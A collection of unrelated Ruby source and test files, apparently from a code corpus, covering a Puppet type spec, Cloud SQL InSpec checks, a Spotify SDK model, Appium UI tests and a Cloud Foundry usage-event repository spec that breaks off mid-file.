# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#
# = moteAppContext.rb
#
# == Description
#
# This class defines a Mote Application Context.
# It behaves exactly like an Application Context but it
# overrides the startApplication method to send a special
# command to the Resource Controller
#
require 'omf-expctl/application/appContext.rb'
class MoteAppContext < AppContext

  #
  # Start a mote Application on a given Node Set
  # This method creates and sends the Command Object to start
  # a mote application on a group of nodes (resources)
  #
  # - nodeSet = the group of nodes on which to start the application
  #
  def startApplication(nodeSet)
    debug("Starting application '#@id'")
    # Get a new Command Object and starting adding info to it
    appDef = @app.appDefinition
    cmd = ECCommunicator.instance.create_message(:cmdtype => :MOTE_EXECUTE,
                                                 :target => nodeSet.groupName,
                                                 :appID => @id,
                                                 :gatewayExecutable => appDef.gatewayExecutable)
    # Add the OML info, if any...
    omlconf = getOMLConfig(nodeSet)
    cmd.omlConfig = omlconf if omlconf != nil
    # Add the environment info... (space-separated KEY=VALUE pairs)
    cmd.env = ""
    getENVConfig(nodeSet).each { |k,v|
      cmd.env << "#{k}=#{v} "
    }
    # Add the bindings...
    pdef = appDef.properties
    # check if bindings contain unknown parameters
    if (diff = @bindings.keys - pdef.keys) != []
      raise "Unknown parameters '#{diff.join(', ')}'" \
        + " not in '#{pdef.keys.join(', ')}'."
    end
    cmd.cmdLineArgs = appDef.getCommandLineArgs(@bindings, @id, nodeSet).join(' ')
    # Ask the NodeSet to send the Command Object
    # NOTE(review): presumably NodeSet#send is a domain "dispatch" method,
    # not Kernel#send — confirm in the NodeSet class.
    nodeSet.send(cmd)
  end

end # ApplicationContext
| 38.402597 | 96 | 0.681434 |
# In-memory test schema: tags and topics joined many-to-many via tags_topics.
ActiveRecord::Schema.define do
  self.verbose = false

  create_table :tags, force: true do |t|
    t.string :name
    t.timestamps
  end

  create_table :topics, force: true do |t|
    t.string :name
    t.timestamps
  end

  # Join table carrying the tag/topic foreign keys.
  create_table :tags_topics, force: true do |t|
    t.belongs_to :tag
    t.belongs_to :topic
    t.timestamps
  end
end
629d48badde052f64c20b0c8d4fe34b94c41803a | 4,794 | require 'spec_helper'
require 'puppet/type/sensu_hook'
describe Puppet::Type.type(:sensu_hook) do
  let(:default_config) do
    {
      name: 'test',
      command: 'test',
    }
  end
  let(:config) do
    default_config
  end
  let(:hook) do
    described_class.new(config)
  end

  it 'should add to catalog without raising an error' do
    catalog = Puppet::Resource::Catalog.new
    expect {
      catalog.add_resource hook
    }.to_not raise_error
  end

  it 'should require a name' do
    expect {
      described_class.new({})
    }.to raise_error(Puppet::Error, 'Title or name must be provided')
  end

  # Expected default value per property; properties absent from this hash
  # have no default. (Keys are symbols via the `'name':` literal syntax.)
  defaults = {
    'namespace': 'default',
    'timeout': 60,
    'stdin': :false,
  }

  # String properties
  [
    :command,
    :namespace,
  ].each do |property|
    it "should accept valid #{property}" do
      config[property] = 'foo'
      expect(hook[property]).to eq('foo')
    end
    # Intentional assignment-in-condition: branch on whether a default exists.
    if default = defaults[property]
      it "should have default for #{property}" do
        expect(hook[property]).to eq(default)
      end
    else
      it "should not have a default for #{property}" do
        expect(hook[property]).to eq(default_config[property])
      end
    end
  end

  # String regex validated properties
  [
    :name,
  ].each do |property|
    it "should not accept invalid #{property}" do
      config[property] = 'foo bar'
      expect { hook }.to raise_error(Puppet::Error, /#{property.to_s} invalid/)
    end
  end

  # Array properties
  [
  ].each do |property|
    it "should accept valid #{property}" do
      config[property] = ['foo', 'bar']
      expect(hook[property]).to eq(['foo', 'bar'])
    end
    if default = defaults[property]
      it "should have default for #{property}" do
        expect(hook[property]).to eq(default)
      end
    else
      it "should not have a default for #{property}" do
        expect(hook[property]).to eq(default_config[property])
      end
    end
  end

  # Integer properties
  [
    :timeout,
  ].each do |property|
    it "should accept valid #{property}" do
      config[property] = 30
      expect(hook[property]).to eq(30)
    end
    it "should accept valid #{property} as string" do
      config[property] = '30'
      expect(hook[property]).to eq(30)
    end
    it "should not accept invalid value for #{property}" do
      config[property] = 'foo'
      expect { hook }.to raise_error(Puppet::Error, /should be an Integer/)
    end
    if default = defaults[property]
      it "should have default for #{property}" do
        expect(hook[property]).to eq(default)
      end
    else
      it "should not have a default for #{property}" do
        expect(hook[property]).to eq(default_config[property])
      end
    end
  end

  # Boolean properties
  [
    :stdin
  ].each do |property|
    it "should accept valid #{property}" do
      config[property] = true
      expect(hook[property]).to eq(:true)
    end
    it "should accept valid #{property}" do
      config[property] = false
      expect(hook[property]).to eq(:false)
    end
    it "should accept valid #{property}" do
      config[property] = 'true'
      expect(hook[property]).to eq(:true)
    end
    it "should accept valid #{property}" do
      config[property] = 'false'
      expect(hook[property]).to eq(:false)
    end
    it "should not accept invalid #{property}" do
      config[property] = 'foo'
      expect { hook }.to raise_error(Puppet::Error, /Invalid value "foo". Valid values are true, false/)
    end
    if default = defaults[property]
      it "should have default for #{property}" do
        expect(hook[property]).to eq(default)
      end
    else
      it "should not have a default for #{property}" do
        expect(hook[property]).to eq(default_config[property])
      end
    end
  end

  # Hash properties
  [
    :labels,
    :annotations,
  ].each do |property|
    it "should accept valid #{property}" do
      config[property] = { 'foo': 'bar' }
      expect(hook[property]).to eq({'foo': 'bar'})
    end
    it "should not accept invalid #{property}" do
      config[property] = 'foo'
      expect { hook }.to raise_error(Puppet::Error, /should be a Hash/)
    end
    if default = defaults[property]
      it "should have default for #{property}" do
        expect(hook[property]).to eq(default)
      end
    else
      it "should not have a default for #{property}" do
        expect(hook[property]).to eq(default_config[property])
      end
    end
  end

  include_examples 'autorequires' do
    let(:res) { hook }
  end

  [
    :command,
  ].each do |property|
    it "should require property when ensure => present" do
      config.delete(property)
      config[:ensure] = :present
      expect { hook }.to raise_error(Puppet::Error, /You must provide a #{property}/)
    end
  end
end
| 25.913514 | 104 | 0.617021 |
module ActsAsDynamicRoute
  module Hook
    # Classic include hook: mixing Hook into a model exposes the
    # acts_as_dynamic_route macro at the class level.
    def self.included(base)
      base.extend(ClassMethods)
    end

    module ClassMethods
      # Registers the model with DynamicRouter and wires an after_save
      # callback that reloads the application's routes.
      def acts_as_dynamic_route(field, *args)
        DynamicRouter.send(:register, self, field, *args)
        class_eval do
          after_save :reload_routes

          define_method(:reload_routes) { DynamicRouter.reload }
          private :reload_routes
        end
      end
    end
  end
end
| 20.136364 | 57 | 0.611738 |
# Service object that applies attribute updates (including financial-value
# parsing) to a budget and reports success/failure via a Result.
class UpdateBudget
  attr_accessor :budget

  def initialize(budget:)
    self.budget = budget
  end

  # Assigns +attributes+, converts the raw :value string into a numeric
  # value, and saves when valid. Returns Result(success, budget).
  def call(attributes: {})
    budget.assign_attributes(attributes)
    convert_and_assign_value(budget, attributes[:value])
    Result.new(budget.valid? && budget.save, budget)
  end

  private

  # Parses the user-supplied value; on parse failure attaches a localized
  # validation error instead of raising.
  def convert_and_assign_value(budget, value)
    budget.value = ConvertFinancialValue.new.convert(value.to_s)
  rescue ConvertFinancialValue::Error
    budget.errors.add(:value, I18n.t("activerecord.errors.models.budget.attributes.value.not_a_number"))
  end
end
| 21.333333 | 104 | 0.726563 |
# frozen_string_literal: true
module Spotify
  class SDK
    class Item < Model
      ##
      # Let's transform the item object into better for us.
      # Before: { track: ..., played_at: ..., context: ... }
      # After: { track_properties..., played_at: ..., context: ... }
      #
      # :nodoc:
      def initialize(payload, parent)
        # History payloads carry :track; currently-playing payloads carry :item.
        track = payload.delete(:track) || payload.delete(:item)
        # Everything else (minus transport noise) is kept under :properties.
        properties = payload.except(:parent, :device, :repeat_state, :shuffle_state)
        super(track.merge(properties: properties), parent)
      end

      ##
      # Get the album for this item.
      #
      # @example
      #   @sdk.connect.playback.item.album
      #
      # @return [Spotify::SDK::Album] album The album object, wrapped in Spotify::SDK::Album
      #
      def album
        Spotify::SDK::Album.new(super, parent)
      end

      ##
      # Get the artists/creators for this item.
      #
      # @example
      #   @sdk.connect.playback.item.artists
      #
      # @return [Array] artists A list of artists, wrapped in Spotify::SDK::Artist
      #
      def artists
        super.map do |artist|
          Spotify::SDK::Artist.new(artist, parent)
        end
      end

      ##
      # Get the primary artist/creator for this item.
      #
      # @example
      #   @sdk.connect.playback.item.artist
      #
      # @return [Spotify::SDK::Artist] artist The primary artist, wrapped in Spotify::SDK::Artist
      #
      def artist
        artists.first
      end

      ##
      # Get the context.
      #
      # @example
      #   @sdk.connect.playback.item.context
      #   @sdk.me.history[0].context
      #
      # @return [Hash] context Information about the user's context.
      #
      alias_attribute :context, "properties.context"

      ##
      # Get the duration.
      # Alias to self.duration_ms
      #
      # @example
      #   @sdk.connect.playback.item.duration # => 10331
      #
      # @return [Integer] duration_ms In milliseconds, how long the item is.
      #
      alias_attribute :duration, :duration_ms

      ##
      # Is this track explicit?
      # Alias to self.explicit
      #
      # @example
      #   @sdk.connect.playback.item.explicit? # => true
      #
      # @return [TrueClass,FalseClass] is_explicit Returns true if item contains explicit content.
      #
      alias_attribute :explicit?, :explicit

      ##
      # Is this a local track, not a Spotify track?
      # Alias to self.is_local
      #
      # @example
      #   @sdk.connect.playback.item.local? # => false
      #
      # @return [TrueClass,FalseClass] is_local Returns true if item is local to the user.
      #
      alias_attribute :local?, :is_local

      ##
      # Is this a playable track?
      # Alias to self.is_playable
      #
      # @example
      #   @sdk.connect.playback.item.playable? # => false
      #
      # @return [TrueClass,FalseClass] is_playable Returns true if item is playable.
      #
      alias_attribute :playable?, :is_playable

      ##
      # Is this a track?
      # Alias to self.type == "track"
      #
      # @example
      #   @sdk.connect.playback.item.track? # => true
      #
      # @return [TrueClass,FalseClass] is_track Returns true if item is an music track.
      #
      def track?
        type == "track"
      end

      ##
      # Get the Spotify URI for this item.
      # Alias to self.uri
      #
      # @example
      #   @sdk.connect.playback.item.spotify_uri # => "spotify:track:..."
      #
      # @return [String] spotify_uri The direct URI to this Spotify resource.
      #
      alias_attribute :spotify_uri, :uri

      ##
      # Get the Spotify HTTP URL for this item.
      # Alias to self.external_urls[:spotify]
      #
      # @example
      #   @sdk.connect.playback.item.spotify_url # => "https://open.spotify.com/..."
      #
      # @return [String] spotify_url The direct HTTP URL to this Spotify resource.
      #
      alias_attribute :spotify_url, "external_urls.spotify"

      ##
      # Get the ISRC for this track.
      #
      # @example
      #   @sdk.connect.playback.item.isrc # => "USUM00000000"
      #
      # @return [String] isrc The ISRC string for this track.
      #
      alias_attribute :isrc, "external_ids.isrc"
    end
  end
end
| 27.170886 | 98 | 0.567901 |
# encoding: utf-8
# frozen_string_literal: true
# A utility that takes a class and a data hash. Creates an instance of the
# class and assigns relevant data from the hash to the instance.
# A utility that takes a class and a data hash. Creates an instance of the
# class and assigns relevant data from the hash to the instance.
class ObjectFactory
  attr_reader :instance

  def initialize(object)
    @instance = object.new
  end

  # Copies matching, non-blank values from +data+ onto the wrapped instance
  # and returns self for chaining.
  def build(data)
    @data = data
    manufacture
    self
  end

  private

  # Walks the data hash, skipping id-like keys and blank values.
  def manufacture
    @data.each_key do |attribute|
      next if skip_attribute?(attribute) || @data[attribute].blank?
      assign_value_to_attribute(attribute, @data[attribute])
    end
  end

  # NOTE(review): the substring match also skips attributes that merely
  # contain "id" (e.g. "video", "paid") — confirm whether exact :id /
  # *_id suffix matching was intended. (Also fixes the "skip_attribue?"
  # typo; the method is private and only called above.)
  def skip_attribute?(attribute)
    attribute.to_s.include? 'id'
  end

  # Assigns via the writer only when the instance actually exposes one.
  def assign_value_to_attribute(attribute, value)
    message = "#{attribute}="
    return unless @instance.respond_to?(message)
    @instance.public_send(message, parse_value(attribute, value))
  end

  # Timestamp-ish attributes (containing "_at") are parsed into Time values.
  def parse_value(attribute, value)
    return Time.zone.parse(value) if attribute.to_s.include? '_at'
    value
  end
end
| 21.863636 | 74 | 0.70894 |
4a4cd0d834412b155e3c219220923d87aafa3b9d | 3,954 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'json'
# InSpec input attributes wired in from the Terraform test fixture.
project_id = attribute('project_id')
basename = attribute('name')
authorized_network = attribute('authorized_network')
# Expected values for the Cloud SQL instance under test; each is asserted
# against `gcloud sql instances describe` output below.
region = "us-central1"
activation_policy = "ALWAYS"
availability_type = "REGIONAL"
data_disk_size_gb = 10
data_disk_type = "PD_SSD"
kind = "sql#settings"
pricing_plan = "PER_USE"
replication_type = "SYNCHRONOUS"
storage_auto_resize = true
storage_auto_resize_limit = 0
tier = "db-custom-2-13312"
# Verifies the provisioned Cloud SQL (SQL Server HA) instance by inspecting
# `gcloud sql instances describe` JSON output.
describe command("gcloud --project='#{project_id}' sql instances describe #{basename} --format=json") do
  its(:exit_status) { should eq 0 }
  its(:stderr) { should eq '' }
  # Parsed JSON from the command, or an empty hash when the command failed.
  let!(:data) do
    if subject.exit_status == 0
      JSON.parse(subject.stdout)
    else
      {}
    end
  end
  describe "mssql_ha_database" do
    it "global settings are valid" do
      expect(data['settings']['activationPolicy']).to eq "#{activation_policy}"
      expect(data['settings']['availabilityType']).to eq "#{availability_type}"
      expect(data['settings']['dataDiskSizeGb']).to eq "#{data_disk_size_gb}"
      expect(data['settings']['dataDiskType']).to eq "#{data_disk_type}"
      expect(data['settings']['kind']).to eq "#{kind}"
      expect(data['settings']['pricingPlan']).to eq "#{pricing_plan}"
      expect(data['settings']['replicationType']).to eq "#{replication_type}"
      expect(data['settings']['storageAutoResize']).to eq storage_auto_resize
      expect(data['settings']['storageAutoResizeLimit']).to eq "#{storage_auto_resize_limit}"
      expect(data['settings']['tier']).to eq "#{tier}"
    end
    it "backend type is valid" do
      expect(data['backendType']).to eq 'SECOND_GEN'
    end
    it "database versions is valid" do
      expect(data['databaseVersion']).to eq 'SQLSERVER_2017_STANDARD'
    end
    it "state is valid" do
      expect(data['state']).to eq 'RUNNABLE'
    end
    it "region is valid" do
      expect(data['region']).to eq region
    end
    it "gce zone is valid" do
      expect(data['gceZone']).to eq "#{region}-a"
    end
    it "location preference is valid" do
      expect(data['settings']['locationPreference']).to include(
        "kind" => "sql#locationPreference",
        "zone" => "#{region}-a")
    end
    it "maintenance window is valid" do
      expect(data['settings']['maintenanceWindow']).to include(
        "kind" => "sql#maintenanceWindow",
        "day" => 7,
        "hour" => 12,
        "updateTrack" => "stable")
    end
    it "ip configuration and authorized networks are valid" do
      # Fixed: the key was written as `["authorizedNetworks"][0]` (an array
      # literal indexed at 0), which evaluates to the same string — use the
      # plain string key directly.
      expect(data['settings']['ipConfiguration']).to include(
        "authorizedNetworks" => [{
          "kind" => "sql#aclEntry",
          "name" => "#{project_id}-cidr",
          "value" => authorized_network
        }],
        "ipv4Enabled" => true,
        "requireSsl" => true,
      )
    end
    it "user labels are set" do
      expect(data['settings']['userLabels']).to include(
        "foo" => "bar")
    end
  end
end
# Verifies the SQL users provisioned on the instance via `gcloud sql users list`.
describe command("gcloud --project='#{project_id}' sql users list --instance #{basename} --format=json") do
  its(:exit_status) { should eq 0 }
  its(:stderr) { should eq '' }
  # Parsed JSON output of the command, or an empty hash when it failed.
  let!(:data) do
    subject.exit_status == 0 ? JSON.parse(subject.stdout) : {}
  end
  describe "mssql_ha_database" do
    it "has 3 users" do
      tftest_users = data.select { |user| user['name'].start_with?('tftest') }
      expect(tftest_users.size).to eq 3
    end
  end
end
| 30.415385 | 107 | 0.651492 |
f7005103cb083f45c29506d16883c6370ff5ad9c | 150 | # Load the rails application
# Load the application definition (config/application.rb).
require File.expand_path('../application', __FILE__)
# Initialize the rails application, running all initializers.
Static::Application.initialize!
| 25 | 52 | 0.8 |
1d05144ee9a75a681b817ead8ceed7dcc8d1cf88 | 858 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/google_ads/v0/enums/keyword_match_type.proto
require 'google/protobuf'
# Registers the generated message/enum descriptors with the global protobuf
# descriptor pool. Generated code — do not edit by hand (see header above).
Google::Protobuf::DescriptorPool.generated_pool.build do
  add_message "google.ads.googleads.v0.enums.KeywordMatchTypeEnum" do
  end
  add_enum "google.ads.googleads.v0.enums.KeywordMatchTypeEnum.KeywordMatchType" do
    value :UNSPECIFIED, 0
    value :UNKNOWN, 1
    value :EXACT, 2
    value :PHRASE, 3
    value :BROAD, 4
  end
end
# Ruby constants resolving to the message class / enum module registered in
# the descriptor pool above.
module Google::Ads::GoogleAds::V0::Enums
  KeywordMatchTypeEnum = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v0.enums.KeywordMatchTypeEnum").msgclass
  KeywordMatchTypeEnum::KeywordMatchType = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v0.enums.KeywordMatchTypeEnum.KeywordMatchType").enummodule
end
| 39 | 179 | 0.794872 |
1a81c0548cd2627c5afcefbeb0fe608893bed45c | 1,456 | # Windows tests only run on Windows.
# Windows-only UI-automation specs; the guard skips the whole file on
# non-Windows hosts (Windows itself sets ENV['OS'] to 'Windows_NT').
if ENV['OS'] == 'Windows_NT'
  require 'spec_helper'
  require 'em/pure_ruby'
  require 'rubygems'
  require 'appium_lib'
  require 'rutl/appium/appium_extension'
  require 'rutl/appium/appium_server'
  require 'rutl/appium/windows_test_app_wrapper'
  require 'rspec'
  RSpec.describe 'windows tests' do
    # A single Appium server instance is shared by every example in this file.
    before(:all) do
      @appium_server = AppiumServer.new
      @appium_server.start
    end
    after(:all) do
      @appium_server.stop
    end
    context 'with notepad' do
      # Drives the stock Windows Notepad application.
      let(:app) do
        RUTL::Application.new(family: :windows, type: :notepad,
                              views: 'spec/views/notepad')
      end
      after do
        app.quit
      end
      it 'types some text and clears and retypes' do
        string = 'hello'
        edit_text.set string
        screenshot
        edit_text.clear
        screenshot
        edit_text.set string
        screenshot
        expect(edit_text).to eq(string)
      end
    end
    context 'with my app' do
      # Drives the sample "hello" test application.
      let(:app) do
        RUTL::Application.new(family: :windows, type: :hello,
                              views: 'spec/views/hello')
      end
      after do
        app.quit
      end
      it 'can close app' do
        close_button.click
        expect(app.open?).to be false
      end
      it 'can close app with exit button' do
        exit_button.click
        expect(app.open?).to be false
      end
    end
  end
end
| 22.060606 | 63 | 0.587912 |
f860a4c0ce017eb230774ebf40483ec0f17dbeec | 998 | =begin
#Tatum API
## Authentication <!-- ReDoc-Inject: <security-definitions> -->
OpenAPI spec version: 3.9.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.31
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Tatum::InlineResponse20067
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
# Generated scaffold spec for Tatum::InlineResponse20067: verifies the model
# can be instantiated and leaves a placeholder example per attribute.
describe 'InlineResponse20067' do
  before do
    # run before each test
    @instance = Tatum::InlineResponse20067.new
  end
  after do
    # run after each test
  end
  describe 'test an instance of InlineResponse20067' do
    it 'should create an instance of InlineResponse20067' do
      expect(@instance).to be_instance_of(Tatum::InlineResponse20067)
    end
  end
  describe 'test attribute "address"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
end
| 24.341463 | 102 | 0.737475 |
18dad7d7530a69e423b0de28f90b6da9760413cb | 26,073 | require 'spec_helper'
require 'repositories/app_usage_event_repository'
module VCAP::CloudController
module Repositories
RSpec.describe AppUsageEventRepository do
subject(:repository) { AppUsageEventRepository.new }
describe '#find' do
context 'when the event exists' do
let(:event) { AppUsageEvent.make }
it 'should return the event' do
expect(repository.find(event.guid)).to eq(event)
end
end
context 'when the event does not exist' do
it 'should return nil' do
expect(repository.find('does-not-exist')).to be_nil
end
end
end
describe '#create_from_app' do
let(:parent_app) { AppModel.make(name: 'parent-app') }
let(:app) { AppFactory.make(app: parent_app, type: 'other') }
it 'will create an event which matches the app' do
event = repository.create_from_app(app)
expect(event).to match_app(app)
expect(event.parent_app_name).to eq('parent-app')
expect(event.parent_app_guid).to eq(parent_app.guid)
expect(event.process_type).to eq('other')
end
it 'will create an event with default previous attributes' do
event = repository.create_from_app(app)
default_instances = App.db_schema[:instances][:default].to_i
default_memory = VCAP::CloudController::Config.config[:default_app_memory]
expect(event.previous_state).to eq('STOPPED')
expect(event.previous_instance_count).to eq(default_instances)
expect(event.previous_memory_in_mb_per_instance).to eq(default_memory)
end
context 'when a custom state is provided' do
let(:custom_state) { 'CUSTOM' }
it 'will populate the event with the custom state' do
event = repository.create_from_app(app, custom_state)
expect(event.state).to eq(custom_state)
event.state = app.state
expect(event).to match_app(app)
end
end
context 'when the app is created' do
context 'when the package is pending' do
before do
app.current_droplet.destroy
app.reload
end
it 'will create an event with pending package state' do
event = repository.create_from_app(app)
expect(event).to match_app(app)
end
end
context 'when the package is staged' do
it 'will create an event with staged package state' do
event = repository.create_from_app(app)
expect(event).to match_app(app)
end
end
context 'when the package is failed' do
before do
app.current_droplet.update(state: DropletModel::FAILED_STATE)
app.reload
end
it 'will create an event with failed package state' do
event = repository.create_from_app(app)
expect(event).to match_app(app)
end
end
end
context 'when an admin buildpack is associated with the app' do
before do
app.current_droplet.update(
buildpack_receipt_buildpack_guid: 'buildpack-guid',
buildpack_receipt_buildpack: 'buildpack-name'
)
end
it 'will create an event that contains the detected buildpack guid and name' do
event = repository.create_from_app(app)
expect(event).to match_app(app)
expect(event.buildpack_guid).to eq('buildpack-guid')
expect(event.buildpack_name).to eq('buildpack-name')
end
end
context 'when a custom buildpack is associated with the app' do
let(:buildpack_url) { 'https://git.example.com/repo.git' }
before do
app.app.lifecycle_data.update(buildpack: buildpack_url)
end
it 'will create an event with the buildpack url as the name' do
event = repository.create_from_app(app)
expect(event.buildpack_name).to eq('https://git.example.com/repo.git')
end
context 'where there are user credentials in the buildpack url' do
let(:buildpack_url) { 'https://super:[email protected]/repo.git' }
it 'redacts them' do
event = repository.create_from_app(app)
expect(event.buildpack_name).to eq('https://***:***@git.example.com/repo.git')
end
end
it 'will create an event without a buildpack guid' do
event = repository.create_from_app(app)
expect(event.buildpack_guid).to be_nil
end
end
context "when the DEA doesn't provide optional buildpack information" do
before do
app.app.lifecycle_data.update(buildpack: nil)
end
it 'will create an event that does not contain buildpack name or guid' do
event = repository.create_from_app(app)
expect(event.buildpack_guid).to be_nil
expect(event.buildpack_name).to be_nil
end
end
context 'fails to create the event' do
before do
app.state = nil
end
it 'will raise an error' do
expect {
repository.create_from_app(app)
}.to raise_error(Sequel::NotNullConstraintViolation)
end
end
context 'when the app already existed' do
let(:old_state) { 'STARTED' }
let(:old_instances) { 4 }
let(:old_memory) { 256 }
let(:app) { AppFactory.make(state: old_state, instances: old_instances, memory: old_memory) }
it 'always sets previous_package_state to UNKNOWN' do
event = repository.create_from_app(app)
expect(event.previous_package_state).to eq('UNKNOWN')
end
context 'when the same attribute values are set' do
before do
app.state = old_state
app.instances = old_instances
app.memory = old_memory
end
it 'creates event with previous attributes' do
event = repository.create_from_app(app)
expect(event.previous_state).to eq(old_state)
expect(event.previous_instance_count).to eq(old_instances)
expect(event.previous_memory_in_mb_per_instance).to eq(old_memory)
end
end
context 'when app attributes change' do
let(:new_state) { 'STOPPED' }
let(:new_instances) { 2 }
let(:new_memory) { 1024 }
before do
app.state = new_state
app.instances = new_instances
app.memory = new_memory
end
it 'stores new values' do
event = repository.create_from_app(app)
expect(event.state).to eq(new_state)
expect(event.instance_count).to eq(new_instances)
expect(event.memory_in_mb_per_instance).to eq(new_memory)
end
it 'stores previous values' do
event = repository.create_from_app(app)
expect(event.previous_state).to eq(old_state)
expect(event.previous_instance_count).to eq(old_instances)
expect(event.previous_memory_in_mb_per_instance).to eq(old_memory)
end
end
end
end
describe '#create_from_task' do
let!(:task) { TaskModel.make(memory_in_mb: 222) }
let(:state) { 'TEST_STATE' }
it 'creates an AppUsageEvent' do
expect {
repository.create_from_task(task, state)
}.to change { AppUsageEvent.count }.by(1)
end
describe 'the created event' do
it 'sets the state to what is passed in' do
event = repository.create_from_task(task, state)
expect(event.state).to eq('TEST_STATE')
end
it 'sets the attributes based on the task' do
event = repository.create_from_task(task, state)
expect(event.memory_in_mb_per_instance).to eq(222)
expect(event.previous_memory_in_mb_per_instance).to eq(222)
expect(event.instance_count).to eq(1)
expect(event.previous_instance_count).to eq(1)
expect(event.app_guid).to eq('')
expect(event.app_name).to eq('')
expect(event.space_guid).to eq(task.space.guid)
expect(event.space_guid).to be_present
expect(event.space_name).to eq(task.space.name)
expect(event.space_name).to be_present
expect(event.org_guid).to eq(task.space.organization.guid)
expect(event.org_guid).to be_present
expect(event.buildpack_guid).to be_nil
expect(event.buildpack_name).to be_nil
expect(event.previous_state).to eq('RUNNING')
expect(event.package_state).to eq('STAGED')
expect(event.previous_package_state).to eq('STAGED')
expect(event.parent_app_guid).to eq(task.app.guid)
expect(event.parent_app_guid).to be_present
expect(event.parent_app_name).to eq(task.app.name)
expect(event.parent_app_name).to be_present
expect(event.process_type).to be_nil
expect(event.task_guid).to eq(task.guid)
expect(event.task_name).to eq(task.name)
end
end
context 'when the task exists' do
let(:old_state) { TaskModel::RUNNING_STATE }
let(:old_memory) { 256 }
let(:existing_task) { TaskModel.make(state: old_state, memory_in_mb: old_memory) }
context 'when the same attribute values are set' do
before do
existing_task.memory_in_mb = old_memory
end
it 'creates event with previous attributes' do
event = repository.create_from_task(existing_task, state)
expect(event.previous_state).to eq(old_state)
expect(event.previous_package_state).to eq('STAGED')
expect(event.previous_instance_count).to eq(1)
expect(event.previous_memory_in_mb_per_instance).to eq(old_memory)
end
end
context 'when task attributes change' do
let(:new_state) { TaskModel::FAILED_STATE }
let(:new_memory) { 1024 }
before do
existing_task.memory_in_mb = new_memory
end
it 'stores new values' do
event = repository.create_from_task(existing_task, new_state)
expect(event.state).to eq(new_state)
expect(event.memory_in_mb_per_instance).to eq(new_memory)
end
it 'stores previous values' do
event = repository.create_from_task(existing_task, state)
expect(event.previous_state).to eq(old_state)
expect(event.previous_package_state).to eq('STAGED')
expect(event.previous_instance_count).to eq(1)
expect(event.previous_memory_in_mb_per_instance).to eq(old_memory)
end
end
end
end
describe '#create_from_build' do
let(:org) { Organization.make(guid: 'org-1') }
let(:space) { Space.make(guid: 'space-1', name: 'space-name', organization: org) }
let(:app_model) { AppModel.make(guid: 'app-1', name: 'frank-app', space: space) }
let(:package_state) { PackageModel::READY_STATE }
let(:package) { PackageModel.make(guid: 'package-1', app_guid: app_model.guid, state: package_state) }
let!(:build) { BuildModel.make(guid: 'build-1', package: package, app_guid: app_model.guid, state: BuildModel::STAGING_STATE) }
let(:state) { 'TEST_STATE' }
it 'creates an AppUsageEvent' do
expect {
repository.create_from_build(build, state)
}.to change { AppUsageEvent.count }.by(1)
end
describe 'the created event' do
it 'sets the state to what is passed in' do
event = repository.create_from_build(build, state)
expect(event.state).to eq('TEST_STATE')
end
it 'sets the attributes based on the build' do
build.update(
droplet: DropletModel.make(buildpack_receipt_buildpack: 'le-buildpack'),
buildpack_lifecycle_data: BuildpackLifecycleDataModel.make
)
event = repository.create_from_build(build, state)
expect(event.state).to eq('TEST_STATE')
expect(event.previous_state).to eq('STAGING')
expect(event.instance_count).to eq(1)
expect(event.previous_instance_count).to eq(1)
expect(event.memory_in_mb_per_instance).to eq(1024)
expect(event.previous_memory_in_mb_per_instance).to eq(1024)
expect(event.org_guid).to eq('org-1')
expect(event.space_guid).to eq('space-1')
expect(event.space_name).to eq('space-name')
expect(event.parent_app_guid).to eq('app-1')
expect(event.parent_app_name).to eq('frank-app')
expect(event.package_guid).to eq('package-1')
expect(event.app_guid).to eq('')
expect(event.app_name).to eq('')
expect(event.process_type).to be_nil
expect(event.buildpack_name).to eq('le-buildpack')
expect(event.buildpack_guid).to be_nil
expect(event.package_state).to eq(package_state)
expect(event.previous_package_state).to eq(package_state)
expect(event.task_guid).to be_nil
expect(event.task_name).to be_nil
end
end
context 'buildpack builds' do
context 'when the build does NOT have an associated droplet but does have lifecycle data' do
before do
build.update(
buildpack_lifecycle_data: BuildpackLifecycleDataModel.make(buildpack: 'http://git.url.example.com')
)
end
it 'sets the event buildpack_name to the lifecycle data buildpack' do
event = repository.create_from_build(build, state)
expect(event.buildpack_name).to eq('http://git.url.example.com')
expect(event.buildpack_guid).to be_nil
end
context 'when buildpack lifecycle info contains credentials in buildpack url' do
before do
build.update(
buildpack_lifecycle_data: BuildpackLifecycleDataModel.make(buildpack: 'http://ping:[email protected]')
)
end
it 'redacts credentials from the url' do
event = repository.create_from_build(build, state)
expect(event.buildpack_name).to eq('http://***:***@example.com')
expect(event.buildpack_guid).to be_nil
end
end
end
context 'when the build has BOTH an associated droplet and lifecycle data' do
let!(:build) do
BuildModel.make(
:buildpack,
guid: 'build-1',
package_guid: package.guid,
app_guid: app_model.guid,
)
end
let!(:droplet) do
DropletModel.make(
:buildpack,
buildpack_receipt_buildpack: 'a-buildpack',
buildpack_receipt_buildpack_guid: 'a-buildpack-guid',
build: build
)
end
before do
build.update(
